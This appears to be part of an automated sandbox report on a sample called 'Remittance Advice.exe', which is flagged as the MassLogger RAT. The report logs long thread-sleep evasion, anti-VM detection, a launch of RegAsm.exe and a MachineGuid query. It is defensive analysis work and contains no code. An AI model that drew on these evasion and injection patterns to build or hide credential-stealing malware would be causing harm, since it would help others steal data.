Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: Remittance Advice.exe PID: 4664, type: MEMORYSTR

Source: C:\Users\user\Desktop\Remittance Advice.exe	Memory allocated: 30E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Memory allocated: 3230000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Memory allocated: 5230000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 9C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 25B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2400000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Remittance Advice.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599786	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599435	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597392	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596693	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596341	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596016	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595016	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594905	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594141	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594016	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 593891	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 2702			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 7137			Jump to behavior

Source: C:\Users\user\Desktop\Remittance Advice.exe TID: 5720	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2080	Thread sleep count: 2702 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -599786s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2080	Thread sleep count: 7137 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -599435s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -599094s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -598984s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -598875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -598765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -598656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -598547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -598437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -598328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -598219s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -598109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -598000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -597891s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -597766s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -597641s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -597531s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -597392s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -597188s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -597000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -596693s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -596563s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -596453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -596341s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -596234s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -596125s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -596016s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -595906s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -595797s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -595687s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -595578s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -595469s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -595344s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -595234s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -595125s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -595016s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -594905s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -594797s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -594687s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -594578s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -594469s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -594359s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -594250s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -594141s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -594016s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6604	Thread sleep time: -593891s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Remittance Advice.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599786	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599435	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597392	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596693	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596341	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 596016	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 595016	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594905	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594141	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 594016	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 593891	Jump to behavior

Source: RegAsm.exe, 00000003.00000002.3924752542.0000000000805000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_009EC168 LdrInitializeThunk,LdrInitializeThunk,

3_2_009EC168

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Remittance Advice.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\Remittance Advice.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Remittance Advice.exe	Queries volume information: C:\Users\user\Desktop\Remittance Advice.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Remittance Advice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Remittance Advice.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected MassLogger RAT

Source: Yara match	File source: 3.2.RegAsm.exe.630000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Remittance Advice.exe.42ce220.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Remittance Advice.exe.42ce220.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Remittance Advice.exe.428d1b0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Remittance Advice.exe.4263380.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Remittance Advice.exe PID: 4664, type: MEMORYSTR
